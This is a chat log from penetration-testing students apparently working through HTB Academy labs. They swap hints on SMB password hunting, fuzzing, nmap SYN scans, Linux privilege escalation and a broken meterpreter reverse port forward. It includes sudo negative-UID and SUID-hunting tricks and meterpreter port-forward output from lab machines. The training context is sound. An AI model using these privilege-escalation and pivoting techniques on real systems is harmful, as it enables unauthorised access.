For Attacking Common Services having trouble with SMB -Finding Jason's password. Hint says pwlist is on the resource. I'm seeing one share w/ read access and the rsa file that a null session doesn't have access to get
Ffs @true horizon do not post answers
Also the answer would be what's after FUZZ:
-v gives a verbose output
Don't worry, it is a BAD answer
?
this is an error not a correct answer
Show the error, instead
?
You provided a command
the question clearly states that you need to curl the website with the fuzzed value for y=
curl -s http://ip:port/post.php -d "y=<VALUE>"; echo ""
I add an echo to a lot of my curl stuff for htb because they'll show inline instead of on a newline for whatever reason
F*****k😖
there's a reason I keep deleting your spoiler: because it's not a BAD answer, you're expected to get something when you curl the website with the fuzzed value
¯_(ツ)_/¯
This 'provided wordlist' this isn't from the previous Attacking common services lesson is it? Tried rockyou and that one w/ local auth
sorry for my carelessness, I will be more careful next time
Thank You for Help
Do I need to create an ffs-level question to get an answer?
wym?
You aren't getting the correct password?
worked fine for me
Maybe I'm not using the right wordlist?
I'm not on-demand support and not obligated to help anyone :) I was simply here between my 20 different tabs of doing my own module
why does -sS need to be run as superuser? is it so that the operating system does not intervene by completing the tcp handshake automatically?
With which command?
sorry nmap
You're thinking correctly AFAIK. I think it's because nmap needs to issue the packets and listen for responses with... uh... lower level calls, directly, whereas typically a process would issue network communication through the OS.
Yeah, raw packets I believe
If you can't tell I'm hardly an expert at "how that works" and can't hope to explain it with clear, accurate language 😅
it's because a regular user can't manipulate raw packets
..which requires elevated permissions
ok ty
definitely gonna write out the explainer for it
I like Linux privesc
the linux privesc module is quite fun (if you already understand the basics)
as it expands on fundamental knowledge and makes you go "wait...I can do that???"
like searching for SUID/SGID bits that you might be able to take advantage of
or even just searching for group permissions that your user may be a part of (id)
Yes, there is a page where you search for a command with SUID to take advantage of, but I don't remember the name
Fun fact: file permissions are actually representable with 4 octal values
special/user/group/others
New to htb academy and thought the wordlist was actually in the environment like the last one(ftp). All good now ty.
always check the module for a resources button :)
What happens if I'm on a website like Twitch that shows live streaming, does a new port open that uses UDP?
Depends on the version of the HTTP protocol used by the website in question. In the case of HTTP/1 or HTTP/2, no. In the case of HTTP/3 (QUIC), yes. However, that port will close once you close your browser or tab.
ty
On a related note: HTB staff — might want to update the modules that talk about the different network protocols to mention that HTTP/3 uses UDP while HTTP/1 and HTTP/2 both use TCP.
Hey guys, quick question: in Linux, if I was trying to use a UID number instead of a username, would the syntax be this: 'sudo -u #0\ command'
all websites open a transit port
open any website then do netstat
I'm currently looking at the man pages and not sure how I should write this command
a website can't deliver its content to you without knowing what port to send the info to
HTTP/3 is relatively new as of the writing of the module
you wouldn't need to use \
but yes sudo -u#<id> command
it's funny because you can do fun stuff like input negative values 🙃
So is -u#<id> close, or do I need to space it?
you don't necessarily need to space it
actually just tested
there can't be any spaces
sudo -u \#UID command
When putting in negative UIDs I get yelled at; is there a certain way to input those?
it depends on the sudo version
:P
generally modern sudo versions aren't exploitable with #-1
Well, it worked to get a flag for a different part of the module. Now to find the file that has the flag for the first question
okay I'm stumped. I'm on the first question for the Linux Privilege Escalation and I'm not sure what file I should be looking for. I've checked the system the best way I know, following along with the module, but I'm not sure what I should be looking for.
I was able to get root though with an exploit I wasn't supposed to use yet, but I don't know what file I should be looking for, hints please
Don't overthink it
You don't need to get root... at all
yea I kinda figured when I did, and the flag I got was for later in the mod
but now I don't know where to look
The find command is powerful
You can use grep with it to locate the flag
Try with different filetypes
-exec is fun to play with, using find might add
Regarding File Transfers - Protected File Transfers.
Do you decrypt the Windows file the same way you do the Linux one? (with openssl)
so I found the flag but how I would just know to look for it that way is over my head
You look for a common file extension basically then you just throw it to grep to find the flag :)
I'm not even gonna pretend I got that from how the mod was laid out but okay.
so the next question is: I was told to find the current version of python on the system and I did that, but it's not taking my answer
X.xx
You don't need to put python in front
That tripped me up
but that doesn't match how the version is laid out. Is it just wanting the last part of it? What's showing is x.x.xx
But what's output by python -V may not be the version that's latest 😉
It doesn't need the subversion
Major.Minor.Sub
hey guys did u know that my uncle actually owns info sect
We don't care
what I'm saying is that since he owns it and he's always on work trips, could you guys teach me python code and so-called hacking
what command website do you do this on?
I literally don't believe you
But htb academy is good... hacking is far beyond python though
any way to force targets to spawn? it's been stuck for quite a bit longer than normal
I'm having the same issue, targets are not spawning
Spoke too soon, after about 15 minutes the targets finally spawned.
Same. hopefully just a hiccup. Trying to finish this lab!
I did change vpn regions, not sure if thats what ultimately led to my success tho. Good luck!
seems like targets are not spawning
yeah that works
yea, had that issue a bit ago, took a solid 15+ min
I was in UK
Can someone help me? I'm feeling really stupid. I can't copy from my home machine's browser into Pwnbox, and I'm unsure as to why
Ctrl+shift+v to paste into terminal
Or fullscreen there should be a clipboard icon
I've tried both, neither seem to work
Nevermind. I guess I did something wrong. Clipboard button worked, in the non-fullscreen mode, it does not accept my copy/paste. Is this a limitation of Firefox, or something else?
if you're using Firefox you will need to use the clipboard to copy and paste
you need to use the clipboard every time
Ah gotcha
it's the problem I face as well
Thank you guys <3
indeed
Y'all know that pwnbox has public ssh, you can forward vnc over that or use remmina to ssh first and connect to vnc. You're not forced to use the browser.
I know I'm not forced, I'm just getting started on pen-testing and cyber security and don't have my machine set up yet.
weird question i have, i want to know the "why"
when I do !cat flag.txt in an smb share it displays the flag, which htb **doesn't** accept.
but when I do get flag.txt in the smb share of the exact flag file, then cat it on my own machine, the flag is now different and is accepted by htb
What was different from the two flags? Just few characters or totally different?
totally different ngl
Never used !cat before, maybe the ! is doing something to it, if I had to guess
I usually use "get flag.txt -" if I wanted to read the flag directly
Guys, can anybody help me with the Nibbles initial foothold module?
I am not getting Remote access
Hey @safe dock Having trouble with remote access? Here's a guide to fix it:
Check network & firewall settings.
Verify remote access software configuration.
Update software & try different device/network.
Seek technical support if needed.
I need a sanity check, I'm going insane on the final skill assessment in the tunneling module
I've done it before up to the last flag, but now my reverse port forward seems to not work
right in the first hop
```text
meterpreter > netstat

Connection list
===============

Proto  Local address  Remote address  State   User  Inode  PID/Program name
-----  -------------  --------------  -----   ----  -----  ----------------
[SNIP]
tcp    :::22          :::*            LISTEN  0     0
tcp    :::4444        :::*            LISTEN  1001  0
tcp    :::8000        :::*            LISTEN  1001  0
tcp    :::80          :::*            LISTEN  0     0
[SNIP]

meterpreter > portfwd

Active Port Forwards
====================

   Index  Local             Remote      Direction
   -----  -----             ------      ---------
   1      10.10.14.50:4444  [::]:4444   Reverse
   2      10.10.14.50:8000  [::]:8000   Reverse

2 total active port forwards.
```
My IP is indeed 10.10.14.50
I also did a port forward of port 8000 to try to ping a netcat listener with a web request, to see if the problem was with the payload, but I still receive no connection
so I think the problem should be with the tunnel
also, I can access the pivot box from the box I'm attacking; I tried starting a nc listener on the pivot instead of the reverse port forward and it worked
I've always found meterpreter heavily clunky
Unless a payload only exists in meterpreter (or the PoC for the exploit is so old its not worth refactoring)
Though good coding practice is refactoring py2.7 code to 3.11 as the python 2to3 module only goes so far
My box is 10.10.14.50, the pivot is 172.16.5.15 and 10.129.229.129, and the machine I'm attacking is 172.16.5.35
tbf I'm trying to use methods mentioned in the module only; also, I had this working with meterpreter before
I don't really know what isn't working now
Do you have the route set?
Anyone have luck with the Windows Server Update Services (WSUS) section of Windows Lateral Movement?
For Q1. Compromise the DC01 using WSUS. Submit the flag located at C:\WSUS\flag.txt, I am not having luck even with instructions in walkthrough for this section.
What route? I'm not routing through the session, it is a reverse port forward
Attacking Enterprise Networks >> post exploit: did anyone face this error before?
I'm gonna try myself and see
oh thank you so much
what was the problem again?
I will DM you my steps in more detail?
Can't get the reverse port forward to work
ideally I'm trying to use it to get a meterpreter shell, but it does not work even for a simple web request
